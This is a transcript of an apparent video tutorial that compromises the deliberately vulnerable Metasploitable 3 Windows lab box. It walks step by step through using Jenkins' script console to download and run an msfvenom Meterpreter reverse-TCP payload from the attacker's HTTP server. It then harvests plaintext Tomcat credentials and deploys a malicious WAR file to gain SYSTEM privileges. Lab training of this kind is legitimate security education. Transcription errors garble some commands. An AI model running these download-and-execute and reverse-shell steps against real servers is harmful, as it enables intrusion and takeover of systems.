Welcome back. In today's video, we're gonna get started and we will fire up Metasploitable 3. So as you can see, I configured and set up Metasploitable 3 Windows and Ubuntu. So basically for the purpose of this video, we're gonna start with the Windows box over here. So I have done some nmap scanning on this box and I found out a couple of ports, not a couple of ports actually, many ports. All right, so here we can see we have many ports, 21, 22, 80, 135, and if I scroll all the way down, I can see other ports. Of course, we cannot fit this video to exploit the box with all the ports, right? We're gonna split the exploitation and enumeration over and across many videos, right? So I type the IP address 168.1.5. All right, so it logs me automatically to the Jenkins server, right? So for some reason in my nmap scanning, this port doesn't show up, right? But I don't think it will be the case for you. So here, as you can see, the exploitation for Jenkins all the time when we are logged in automatically due to default credentials left by system administrators, the first thing we look for when we see Jenkins server is to look for a path to allow us to execute scripts. So we have done some Jenkins exploitation when we published some videos on the Cybersecurity Labs. Now I'm going to put the video which has to do with this exploitation of Jenkins on the videos card, so we can access it for references. So here, scripts. It must be script. All right. So in here, the software developers can execute scripts from this box, and everything when they click run, all the commands they enter here will be executed on the back-end system. In our case, it is the Windows system. So it's a way to communicate with your Windows or web server whatsoever from the script console. Anyway, Jenkins is a platform for software development. So if you have done some software development before, you will get what I mean. Okay, so I have here a space for executing scripts, right? So I have multiple options to start my exploitation. I either can, since my underlying system is Windows, I can do PowerShell, or I can do Groovy script. Since Jenkins is written in Groovy, I can execute Groovy script. And my way of doing this all the time is we use PowerShell or native Windows system commands, right? In my case, I'm going to use PowerShell to download a payload onto the Windows system, and then we execute that payload with the help of our script console here. So if we go back and create some payload, let's create some payload here on, let's do splitting, horizontal splitting, and lift this up, sudo msf venom -p, and it's up to us to choose the type of payload. For me, I'm going to choose Meterpreter. It's more reliable, shell all the time, Windows, Meterpreter, reverse, TCP, lhost is our IP, 7, lport. Of course, we don't have firewall on the remote host, so I am free to get any port I want. So 4545 -f, it's going to be an executable file, and there is no hesitation to choose the file extension since we are dealing with a remote host. There is no antivirus considerations. And here we're going to put something like, all right, Jenkins, gen.exe. And while the payload is being created, let's go back to the script console and create and craft our the first PowerShell command. So here from my manual, I'm going to copy that. So here we're going to use, let's copy all of that. go back and paste them here, and we're gonna modify the parameters to fit our scenario. Let's go back to the command line. So my payload has been created. My next step is to create a Python server in order for the remote host to download or be able to download the payload I have created. So Python 3-m HTTP server. Okay, now my payload is available for download. I'm going to go back. Okay, so here we're going to leave these as is. So HTTP, and here we're going to put the URL, right? Here is the URL of the server from which we're going to retrieve the payload. So it's going to be our IP, 192.168.1.7, and here jenk.exe. And on here, the output will be the directory which is going to contain the payload. So in my case, we can select anything, but we need to make sure that the path is writable. That is why we're going to need to select the Jenkins directory. Jenkins can be found in the program files. So here I'm going to do like that. And in here, I'm going to type program files, copy another one. I guess I need to use double backslash. Oh, what was that? I told you guys I have a faulty control paste here. Let's go back, remove this. Make sure I copy this. Okay, it's not hard. Why my computer finds out? I don't know. I'm gonna put another one, and then program files, Jenkins scripts, and put here the name. Right, the name will be jenk.exe, and here we're gonna remodify that 192.168.1.7 8000, and here we're gonna type the name of the payload. All right. So here, after that, our payload is ready to be downloaded. Now let's execute, or let's copy that. Copy and run. So what do we have here? We have some error. Okay, let me remove the line for the SSL policy, so I don't need to download it from, since we are not downloading that from SSL, I'm going to remove that and go up, invoke, another error. So here what we have, startup failed, invoke web request. All right, I think we need to define that. So here we can type print or ln, right? And then a new process builder. We're going to open parentheses here, PowerShell.exe, and then we're going to put another quote, double quote. My parameters are configured correctly, so all I have to do now is to close the code, right? So let's make another inspection on that. So here we need some, okay, so the URL is configured here. All right, so here we're gonna enclose that with another double quote. I guess we are even now. I just like to make sure that everything, the double quotes are spread correctly. So here we need another one. Okay, now let's enclose that with another parenthesis. And we type here something like redirect error stream. Or let's first, let me not redirect that. I want to see if my payload has been executed or the commands are correctly. So run Groovy language. So in PowerShell, we don't have anything else. Let's go see the terminal. All right, so okay. So let's do that. Let's cancel. Let's copy that here. And the URL will be like that. Let me define them in a bare mode. So here we take the output, and instead of the output here will be like that. And let's remove that. Maybe the Jenkins console is confused about our parameters definition. Let's run. Okay, let's see here. Oh, still no luck. Let's go back. So they got Java language process builder. Okay, let's try that then. Redirect, error, stream, and it's gonna be true dot start, and then we need something like text. Okay, let's try that. Run. So nothing is being served from my server. So I guess I made a mistake in the IP. No. Let's go back. So it's 5. It's 7. And instead of 5, it is my IP. I made a mistake. Now here we run. Let's see here. All right. So the file has been downloaded. That is great. Let's go back. All right. So now let's set up a listener so we can execute the payload. So here, let's put horizontally and sudo sf. All right. So use exploit multi handler set payload. The payload will be something like Windows interpreter reverse TCP set lhost RIP 192.168.1.7 set lport 5 and run. Now let's go back to the browser and execute the payload that we have just downloaded. Let's go back here and let's take that. Paste that. So here we're going to execute Jenkins, and run. So we received the first Meterpreter session on our Metasploit. So here we got the Meterpreter session, and the first thing we will do, guys, is to make sure or to see what is our privilege, who we are. So we type shell. Of course, you can do the Meterpreter. So we go up and we take a look at the commands. We go down. So these are the networking commands, system commands. So here we can get UID. So let's see who is the user. We are running net authority local servers. So this is different from net authority system. So we need some way around this. I mean, the next step is to conduct privilege escalation, right? So now let's drop to shell. Now, after we drop to shell, the way out or the way in to the privilege escalation is to look for the Tomcat server. That's what I did actually. So if we go back to the nmap scan, oh, not this one. So here, nmap, nmap. So we go up, we see we have a Tomcat server running on port 8020. And we have, I think, another instance of that Tomcat server. I'm not sure where it is. So after we get the interpreter shell here, and we see that we are local service, net authority local service. So the next step is, as you know, to conduct privilege escalation. And as you watched across all the last videos, we saw that we have many ways, right? We're not gonna spend nights trying every single one of them. I'm just gonna head directly to the one that worked. So the one that worked, of course, there are many, but for the scenario of this video, if you go up to the, what was it? The nmap scan, we can see we have Tomcat server running. Now, the credentials to that Tomcat server, we can find it here. So we need to log into that Tomcat server and upload another shell that will give us net authority system. Okay. So now the next step is we need to browse to the Tomcat. So we go down, cd out of this, cd out of that directory, and we go up. We see here we have the where was the Tomcat? So Apache server, yeah. So Apache server foundation. Let's cd into that directory. Oh, I'm not gonna type this. Okay, let's copy it. Copy. Go there, back. All right. So we have here Tomcat, cd Tomcat directory. Tomcat. Okay. So as you can see here, we have another directory. Let's go to that directory again. Copy. Paste. Directory. And here in the config file, you will see plain text credentials, right? So let's find out what are the credentials. So cat conf. Oh, I'm in Linux. Oh my God. Type conf and access denied. I think it's not for review. It's directory. Okay, so here in the directory of inside the directory of conf, we can see that we have Tomcat users.xml. So if we spill out the content of that, we will find the plain text credentials that will give us paste. Okay, so here you can see username, Tomcat, password must be changed. Oh, we go down, we have username exploit and password exploit. Now let's go now and log into the Tomcat server in order to generate, to upload the payload. So once I All right, let's browse to the Tomcat 1.8.5.8282. And now the next step is we upload a payload, right? So if you go to Manager app, and you see here, because I have logged in before, it didn't ask me for the username and password. But if it asks you, just type exploit, right? Just from the command line here. I don't like to show it twice, so let's go back. All right, so here we have the ability or the opportunity to upload something here, right? War file to deploy. So all we have to do is to create a Metasploit or MSFN payload extension war, right? So let's do that. Let's go back and let's close that terminal, collapse, and collapse this. Let's create a new one. Sudo msfvenom dash p windows, or let's do that. I think it's smarter. Yeah. So here we're gonna change the local port. It's gonna be 4546, and the payload extension will be different. In this case, instead of exe, it will be war, and here it's gonna be Jenk. No, it's gonna be Tom W. War. So now the payload has been generated. Let's upload that now. Browse home tomw.war, deploy. Okay. Now the next step is to browse to the GSP file. What I am talking about, right? So if we see here, we have the tomw.war, right? If we browse to the word extension in the web server, we're not going to trigger the payload. We need to find the GSP file, right? JavaScript file or the jar file. For that, we need to find the name. So what is the name of this file that we have just uploaded? So it's jar. Let's unzip that, xvf, and here Tom. So the file that we will browse to is this one. So let's copy it. And before browsing, let's launch MSF console and set up our listener. Sudo use exploit multi handler set payload windows interpreter reverse TCP set lhost khost lhost 192.168.1.7 set lport, which I forget the most, 4546, run, and let's browse. So here, in order to browse, what we're going to do, you can open a new instance or a new tab, .1.5.82.82, and here we're going to type war, right? What was the name of the file? Tom W. And in here, we're going to type the name of the payload and enter. Let's see if we received something. Oh, so we received a interpreter session here, as you can see. Let's get the UID and see if we have escalated our privileges successfully. Okay, that's great. So our privilege has been escalated, and now we are net authority system. Let's do a quick summary on this challenge. So basically, we did the nmap scanning, as you can see here, and we started with a couple of ports. We browsed to the Jenkins, and in Jenkins, we have downloaded a payload generated by Metasploit, MSFvenom, sorry, with PowerShell. So we use PowerShell, right? PowerShell commands to download and execute this payload. We received the first interpreter session, and the first interpreter shell we were able to grab plain text credentials of the Tomcat server around this here. Once we gained the plain text credentials, we were able to log into the Tomcat server, and we found a place or a spot which allows us to upload a word payload. We created our own word payload, and then where was it? So then we here extracted the payload, and we saw that the GSP file that we need to browse to. So we went back and we browsed to the file. We triggered our last interpreter for this session or for this video, which gave us net authority system. And that's the first way around this box, Metasploitable 3. Now, what can we learn? What's the lessons learned? The first lesson learned, guys, is first the plain text credentials. Don't leave plain text credentials on your system, no matter how. Put them in a KeyPass database, encrypt them, put them out of the system, roll them out. I don't know what you're going to do, but just don't put plain text credentials in Notepad as well. I see this is a common practice between end users and even system administrators. The plain text credentials, you may deem it trivial to do privilege escalation, but believe me, guys, there are many people who leave their credentials on their desktop, on other directories or files, so just for easy of access and convenience. So plain text credentials allowed us to gain access to the web server, regardless of the identity of the web server. I mean, it's Tomcat, it's any shit, right? So, and we were able to upload a payload. Since we have access or login, like we logged in as an admin, we can upload anything we want, right? So I upload our own shell. Just don't focus on the details. It's Word, PHP, whatever. I mean, take it as a broad picture. Default credentials, right, gave us access to a web server. The web server, here we were able to upload a payload that gave us a session back here, which is already privileged net authority system. That's how we did that. So I hope you find this enjoyable, and we see you in the next video in another Metasploitable 3 session.